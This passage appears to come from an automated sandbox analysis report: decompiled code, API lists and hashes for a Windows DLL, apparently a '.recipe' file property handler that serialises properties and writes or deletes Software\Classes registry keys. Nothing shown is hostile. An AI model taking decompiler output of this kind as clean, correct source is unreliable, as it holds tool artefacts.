					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}

0x10002f79
0x10002f80
0x10002f85
0x10002f89
0x10002f9a
0x10002f9c
0x10002fa4
0x10002fb1
0x10002fb9
0x10003285
0x10003295
0x10002fd7
0x10002fd7
0x10002fda
0x10002fe0
0x10002fee
0x10002ff6
0x10003272
0x10003277
0x1000327d
0x00000000
0x10003283
0x10002ffc
0x10003002
0x10003009
0x10003017
0x1000301d
0x10003023
0x10003027
0x1000307e
0x1000307e
0x10003264
0x10003264
0x1000326d
0x00000000
0x1000326d
0x1000309c
0x100030a1
0x100030a8
0x10003258
0x10003258
0x10003261
0x00000000
0x10003261
0x100030b2
0x100030bc
0x100031fe
0x1000320d
0x10003215
0x1000321b
0x1000321f
0x00000000
0x00000000
0x10003221
0x10003227
0x10003237
0x1000323a
0x1000323e
0x1000324c
0x1000324c
0x10003255
0x00000000
0x10003255
0x10003240
0x10003240
0x10003249
0x00000000
0x10003249
0x100030dd
0x100030e2
0x100030e6
0x00000000
0x00000000
0x100030ec
0x100030f2
0x100030f9
0x1000310b
0x1000310d
0x10003111
0x00000000
0x00000000
0x1000311e
0x10003128
0x10003130
0x10003138
0x1000313d
0x10003144
0x10003157
0x1000315a
0x10003162
0x1000316a
0x1000316f
0x10003175
0x1000317c
0x1000317e
0x10003184
0x1000318c
0x10003198
0x1000319c
0x100031a5
0x100031aa
0x100031b0
0x100031b4
0x100031b6
0x100031bc
0x100031c4
0x100031d0
0x100031d4
0x100031dd
0x100031e8
0x100031e8
0x100031f1
0x100031f1
0x100031fa
0x100031fa
0x00000000
0x10003144
0x10003029
0x1000302c
0x10003033
0x10003045
0x1000304b
0x1000304f
0x00000000
0x00000000
0x10003055
0x1000305b
0x1000306b
0x1000306e
0x10003070
0x10003079
0x1000307c
0x00000000
0x1000307c

APIs

_memset.LIBCMT ref: 10002F9C
PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1

Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6

VariantClear.OLEAUT32(?), ref: 100031F1
VariantClear.OLEAUT32(?), ref: 100031FA
CoTaskMemFree.OLE32(?), ref: 1000327D

Strings

EncodedValue, xrefs: 100031CB
Property, xrefs: 100030D0
ExtendedProperties, xrefs: 10003011, 1000303F
Property[@Key = '%s'], xrefs: 1000308B
Key, xrefs: 10003193

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
API String ID: 2822920939-4160240301
Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x10007719
0x1000771b
0x10007720
0x10007727
0x1000772d
0x1000772f
0x10007738
0x10007758
0x1000775c
0x1000775d
0x1000775e
0x10007765
0x10007767
0x1000776c
0x10007785
0x1000778a
0x10007790
0x10007799
0x1000779f
0x100077a2
0x100077a5
0x100077ae
0x100077b1
0x100077b7
0x100077ba
0x100077bd
0x100077c0
0x100077c3
0x100077c3
0x100077ce
0x100077d9
0x10007908
0x10007908
0x10007908
0x1000790e
0x00000000
0x00000000
0x10007919
0x1000791f
0x10007925
0x1000793a
0x10007940
0x10007947
0x1000794c
0x1000794e
0x10007942
0x10007944
0x10007944
0x10007958
0x1000795d
0x100079a4
0x100079aa
0x100079ad
0x100079b3
0x100079ba
0x100079bf
0x100079bf
0x00000000
0x10007963
0x10007964
0x1000796c
0x00000000
0x00000000
0x1000796e
0x10007970
0x10007978
0x10007985
0x10007990
0x10007995
0x10007999
0x1000799f
0x00000000
0x1000799f
0x1000798b
0x1000798d
0x1000798d
0x00000000
0x1000798d
0x1000797e
0x00000000
0x1000797e
0x1000792c
0x10007932
0x100079c6
0x100079c6
0x00000000
0x100079c6
0x10007925
0x100079cc
0x100079d3
0x1000774d
0x1000774f
0x10007750
0x10007755
0x10007755
0x100077df
0x100077e4
0x00000000
0x00000000
0x100077ea
0x100077ec
0x100077ef
0x100077f2
0x100077f7
0x10007801
0x10007803
0x10007805
0x10007805
0x1000780a
0x1000780b
0x1000780e
0x10007820
0x10007822
0x10007827
0x100078bb
0x100078c2
0x100078c8
0x100078d8
0x100078de
0x100078e1
0x100078e4
0x100078e8
0x100078ee
0x100078f1
0x100078f4
0x100078f7
0x100078f7
0x100078fc
0x100078fd
0x10007900
0x00000000
0x10007900
0x1000782d
0x10007833
0x00000000
0x10007833
0x10007836
0x10007838
0x1000783b
0x1000783e
0x10007841
0x10007849
0x1000784e
0x100078a8
0x100078a8
0x100078a9
0x100078af
0x100078b0
0x100078b3
0x100078b6
0x00000000
0x10007855
0x10007855
0x10007859
0x00000000
0x00000000
0x1000785d
0x1000786d
0x1000787a
0x10007881
0x10007886
0x1000788d
0x10007895
0x10007899
0x1000789f
0x100078a2
0x100078a5
0x100078a5
0x00000000
0x100078a5
0x10007860
0x10007866
0x1000786b
0x00000000
0x00000000
0x00000000
0x1000786b
0x1000784e
0x00000000
0x10007841
0x10007779
0x10007781
0x00000000
0x10007781
0x10007745
0x00000000

APIs

__lock.LIBCMT ref: 10007727

Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6

@_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
__calloc_crt.LIBCMT ref: 1000775E
@_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
__calloc_crt.LIBCMT ref: 10007819
GetFileType.KERNEL32 ref: 10007860
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
GetStdHandle.KERNEL32(-000000F6), ref: 10007952
GetFileType.KERNEL32 ref: 10007964
InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 301580142-0
Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0xb015c968
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}

0x10003409
0x10003410
0x10003417
0x1000341b
0x10003425
0x10003428
0x1000343f
0x10003441
0x1000344b
0x10003458
0x10003458
0x00000000
0x1000344d
0x1000344d
0x10003452
0x00000000
0x10003454
0x10003454
0x1000345d
0x1000345f
0x1000345f
0x10003454
0x10003452
0x10003465
0x1000347a
0x1000348a
0x10003490
0x10003494
0x1000349f
0x1000349f
0x100034a1
0x100034a3
0x100034b0
0x100034ba
0x100034c2
0x100034e2
0x100034e8
0x100034c4
0x100034c4
0x100034d4
0x00000000
0x00000000
0x100034d4
0x100034c2
0x100034b0
0x100034a1
0x10003501

APIs

vswprintf.LIBCMT ref: 10003441

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
StrCmpNICW.SHLWAPI(B015C968,Software\Classes\%s,00000013), ref: 100034BA
StrStrIW.SHLWAPI(B015C968,PropertyHandlers), ref: 100034D0
StrStrIW.SHLWAPI(B015C968,KindMap), ref: 100034DC

Strings

PropertyHandlers, xrefs: 100034CA
Software\Classes\%s, xrefs: 100034B4
KindMap, xrefs: 100034D6

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_llstrlenvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1581644826-984809517
Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0xb015c968
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}

0x10003519
0x10003520
0x10003527
0x1000352b
0x10003535
0x10003538
0x1000354f
0x10003551
0x1000355b
0x10003568
0x10003568
0x00000000
0x1000355d
0x1000355d
0x10003562
0x00000000
0x10003564
0x10003564
0x1000356d
0x1000356f
0x1000356f
0x10003564
0x10003562
0x10003575
0x10003585
0x1000358d
0x10003593
0x10003597
0x100035a2
0x100035a2
0x100035a4
0x100035a6
0x100035b3
0x100035bd
0x100035c5
0x100035e5
0x100035eb
0x100035c7
0x100035c7
0x100035d7
0x00000000
0x00000000
0x100035d7
0x100035c5
0x100035b3
0x100035a4
0x10003604

APIs

vswprintf.LIBCMT ref: 10003551

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
StrCmpNICW.SHLWAPI(B015C968,Software\Classes\%s,00000013), ref: 100035BD
StrStrIW.SHLWAPI(B015C968,PropertyHandlers), ref: 100035D3
StrStrIW.SHLWAPI(B015C968,KindMap), ref: 100035DF

Strings

Recipe (.recipe) Property Handler, xrefs: 1000352A
PropertyHandlers, xrefs: 100035CD
Software\Classes\%s, xrefs: 100035B7
KindMap, xrefs: 100035D9

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
API String ID: 396321892-1357300599
Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0xb015c968
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}

0x10003319
0x10003320
0x10003328
0x1000332b
0x10003344
0x10003346
0x10003350
0x1000335d
0x1000335d
0x10003362
0x10003364
0x10003368
0x1000336a
0x1000336c
0x10003374
0x1000337a
0x1000337e
0x10003383
0x10003383
0x1000337e
0x10003389
0x1000338e
0x10003390
0x1000339d
0x100033a7
0x100033af
0x100033d7
0x100033d7
0x100033af
0x1000339d
0x100033e9
0x100033ed
0x100033fa
0x100033fa
0x10003352
0x10003357
0x00000000
0x00000000
0x10003359
0x00000000
0x1000335b
0x00000000
0x1000335b

APIs

vswprintf.LIBCMT ref: 10003346

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7

Strings

PropertyHandlers, xrefs: 100033B1
Software\Classes\%s, xrefs: 100033A1
KindMap, xrefs: 100033C1

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

